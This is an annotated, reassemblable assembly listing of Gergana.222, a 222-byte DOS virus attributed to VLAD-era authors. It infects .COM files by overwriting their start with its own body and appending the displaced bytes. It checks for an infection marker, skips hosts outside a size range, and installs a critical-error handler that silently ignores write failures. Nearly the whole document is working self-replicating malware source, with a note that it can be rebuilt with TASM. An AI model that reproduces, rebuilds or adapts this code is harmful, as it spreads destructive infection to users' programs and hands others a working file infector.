-
- ; Gergana.222
- ; disassembly by Metabolis/VLAD
- ; with a small amount of help from Qark :)
-
- ; I thought it would be interesting since it infects the start of
- ; files whereas most will append.
-
- ; Of course the virus is from Bulgaria, but did you know Gergana
- ; is a female Bulgarian name? ;)
-
- ; use TASM to re-assemble
-
; Fixed addresses used by the body. Everything is an offset inside the one
; 64K segment of a .COM image (DOS loads a .COM with CS = DS = ES = SS = PSP,
; code at 100h), so all of these are reachable through DS/CS without a far
; pointer.
int24s   equ 12h        ; PSP offset of the saved INT 24h handler offset
int24o   equ 14h        ; PSP offset of the saved INT 24h handler segment
dtapos   equ 80h        ; default DTA in the PSP; restored before the host runs
fbuffer  equ 0FA00h     ; 222-byte buffer for the host's original first 222 bytes
inf_flag equ 0FA46h     ; fbuffer+46h: the host word compared with the marker
tempdta  equ 0FF80h     ; scratch DTA for the search; later holds the relocated stub
filename equ 0FF9Eh     ; tempdta+1Eh: ASCIIZ name field of the find-first DTA
-
seg_a   segment byte public             ; the single code+data segment of the .COM
        assume  cs:seg_a, ds:seg_a      ; DS = CS holds everywhere except the few
                                        ;   instructions at finish_up that load DS

        org     100h                    ; .COM load offset; every label below is
                                        ;   relative to this
-
;-----------------------------------------------------------------------
; gerg_222 - entry of the 222-byte body at offset 100h of the image.
; Target: 16-bit DOS .COM, TASM syntax, DS = ES = CS on entry.
; Flow:   push host length -> move the DTA out of the PSP -> find first
;         *.COM -> install the INT 24h stub -> for each match: open, read
;         the first 222 bytes, then fall into 'infect' (defined further
;         down) or continue at find_next.
; Stack:  the word pushed at 'start' is the only thing left on the stack;
;         every call/int below balances, and execute_original pops it.
;-----------------------------------------------------------------------
gerg_222 proc far

start:
        mov     ax,flength              ; flength = host's original length
                                        ;   (0DEh in the first generation; patched
                                        ;   by 'infect' before the body is written)
        push    ax                      ; consumed by 'pop si' in execute_original
        mov     dx,tempdta              ; DS:DX = scratch DTA, so the search does
        mov     ah,1Ah                  ;   not overwrite the PSP DTA at 80h
        int     21h
        mov     cx,20h                  ; attribute mask 20h = archive
        mov     dx,offset filemask      ; DS:DX = '*.COM'
        mov     ah,4Eh                  ; find first match; the result record
        int     21h                     ;   lands in the DTA (tempdta)
        jc      finish_up               ; nothing matched: restore state, run host
        mov     dx,offset int_24h_entry ; DS:DX = replacement critical-error
        mov     ax,2524h                ;   handler (AH=25h set vector, AL=24h);
        int     21h                     ;   it answers "ignore" to every error

read_virus:
        mov     dx,filename             ; DS:DX = name field of the find DTA
        mov     ax,3D02h                ; open, access mode 2 = read/write
        int     21h
        jc      find_next               ; open failed (read-only etc.): next match
        xchg    bx,ax                   ; BX = handle; AX now holds the old BX
        mov     cx,0DEh                 ; read the host's first 222 bytes ...
        mov     dx,fbuffer              ;   ... into fbuffer; 'infect' appends
        mov     ah,3Fh                  ;   exactly this buffer to the host later
        int     21h
        jnc     infect                  ; read ok: fall through to 'infect'
find_next:
        call    close_file              ; closes the handle in BX; on the path from
                                        ;   the failed open above BX still holds an
                                        ;   older handle or its startup value, and
                                        ;   the close result is ignored either way
        mov     ah,4Fh
        int     21h                     ; find next, same DTA and mask
        jc      finish_up               ; no more matches
        jnc     read_virus              ; always taken here (CF is clear)

gerg_222 endp
-
;-----------------------------------------------------------------------
; close_file - DOS close (AH=3Eh)
; In:    BX = file handle
; Out:   CF set and AX = error code on failure (every caller ignores it)
; Clobb: AX, flags
;-----------------------------------------------------------------------
close_file proc near
        mov     ah,3Eh
        int     21h                     ; close the handle in BX
        retn
close_file endp
-
filemask db     '*.COM', 00h            ; ASCIIZ search mask; its first two bytes
                                        ;   ('*.' = word 2E2Ah) are also the
                                        ;   already-infected marker tested in 'infect'
flength  dw     0DEh                    ; host length: 0DEh in the first generation,
                                        ;   patched to the host's size by 'infect'
                                        ;   before the body is written out
-
;-----------------------------------------------------------------------
; write_virus - DOS write (AH=40h) of exactly 222 bytes at the current
;               file position
; In:    BX = handle, DS:DX = source (fbuffer or 100h)
; Out:   CF set on failure, AX = bytes written or error code; a short
;        write (AX < CX with CF clear) is not detected by any caller
; Clobb: AX, CX, flags
;-----------------------------------------------------------------------
write_virus proc near
        mov     ah,40h
        mov     cx,0DEh                 ; body length, 222 bytes
        int     21h
        retn
write_virus endp
-
;-----------------------------------------------------------------------
; infect - reached by fall-through from read_virus with BX = open handle
;          and fbuffer = the host's first 222 bytes.
; Host layout after infection (from the two writes below):
;   offset 0..DDh   the 222-byte body, flength patched to the host size
;   offset DEh..    the untouched remainder of the host
;   offset size..   the host's original first 222 bytes (from fbuffer)
; finish_up is shared with the no-match paths of gerg_222.
;-----------------------------------------------------------------------
infect:
        mov     cx,cs:inf_flag          ; word at fbuffer+46h = host bytes 46h..47h
        cmp     cx,2E2Ah                ; 2A 2E = '*.', the start of filemask; by
                                        ;   address arithmetic filemask sits at
                                        ;   body offset 46h, so a match means the
                                        ;   host already starts with this body
                                        ;   (the same word is a scanner marker)
        je      find_next               ; already infected: next file
        mov     ax,4202h                ; lseek(handle, 0, SEEK_END)
        xor     cx,cx                   ;   CX:DX = 0
        xor     dx,dx
        int     21h                     ; DX:AX = file size
        cmp     ax,0C350h               ; only the low word is checked (DX ignored):
        ja      find_next               ;   skip hosts > 50000 bytes ...
        cmp     ax,100h                 ;   ... and hosts < 256 bytes
        jb      find_next
        mov     flength,ax              ; patch flength in the in-memory body so the
                                        ;   copy written below carries the host size
                                        ;   (read back by 'pop si' in the stub)
        mov     dx,fbuffer              ; DS:DX = saved original head
        call    write_virus             ; append the 222 saved bytes at EOF (the
                                        ;   file pointer is still at the end)
        jc      find_next               ; write failed: leave this file
        mov     ax,4200h                ; lseek(handle, 0, SEEK_SET)
        xor     cx,cx
        xor     dx,dx
        int     21h
        mov     dx,100h                 ; DS:DX = the body in memory
        call    write_virus             ; overwrite the host's first 222 bytes
        jc      find_next               ; write failed: the head is appended but
                                        ;   the body is not (host left as is)
        call    close_file              ; done with this host
finish_up:
        mov     dx,cs:int24s            ; DS:DX = the INT 24h vector DOS saved in
        mov     ax,cs:int24o            ;   the PSP (offsets 12h/14h) at load time
        mov     ds,ax
        mov     ax,2524h                ; put the original critical-error handler
        int     21h                     ;   back
        push    cs                      ; DS = CS again
        pop     ds
        mov     ah,1Ah
        mov     dx,dtapos               ; DTA back to the PSP default at 80h
        int     21h
        mov     si,offset execute_original
        mov     di,tempdta              ; ES:DI = tempdta (ES = CS for a .COM)
        mov     cx,30h
        rep     movsb                   ; move the stub out of the way: it is about
                                        ;   to overwrite 100h.. including itself
        jmp     $-237h                  ; by encoding-size count this jmp sits at
                                        ;   1B7h, so $-237h wraps to 0FF80h =
                                        ;   tempdta: continue in the relocated stub
-
;-----------------------------------------------------------------------
; execute_original - stub that runs from its copy at tempdta (see the jmp
;                    at the end of finish_up). Restores the host's original
;                    first 222 bytes over the body and enters the host.
; Stack: the word pushed at 'start' is on top.
; Uses:  DS:SI source, ES:DI destination (DS = ES = CS for a .COM).
;-----------------------------------------------------------------------
execute_original:

        pop     si                      ; SI = flength pushed at 'start' = host size
        add     si,100h                 ; DS:SI = 100h+size: where the saved head
                                        ;   was appended (first generation: the
                                        ;   4-byte nop/nop/int 20h "host" at the
                                        ;   end of this listing)
        mov     di,100h                 ; ES:DI = .COM load address
        mov     cx,0deh                 ; 222 bytes
        repz    movsb                   ; put the original head back in place
        mov     ax,100h
        jmp     ax                      ; run the restored host from its entry
-
copyright db 'Gergana II -BUL'         ; 15-byte author string; nothing references
                                        ;   it at run time (it only travels with the
                                        ;   30h-byte stub copy because it follows
                                        ;   execute_original in memory)
-
;-----------------------------------------------------------------------
; int_24h_entry - replacement INT 24h (critical error) handler
; Returns AL = 0 ("ignore") to DOS, so a failing write (read-only or
; write-protected media, for example) is swallowed instead of raising the
; Abort/Retry/Fail prompt. Installed in gerg_222, restored at finish_up.
; Clobb: AX
;-----------------------------------------------------------------------
int_24h_entry proc far
        xor     ax,ax                   ; AL = 0: ignore the error
        iret
int_24h_entry endp
-
        db      90h, 90h,0CDh, 20h      ; first-generation "host": nop, nop,
                                        ;   int 20h (terminate). With flength
                                        ;   still 0DEh this is what the stub
                                        ;   copies to 100h and jumps to.

seg_a   ends

        end     start                   ; entry point = 'start' at offset 100h
-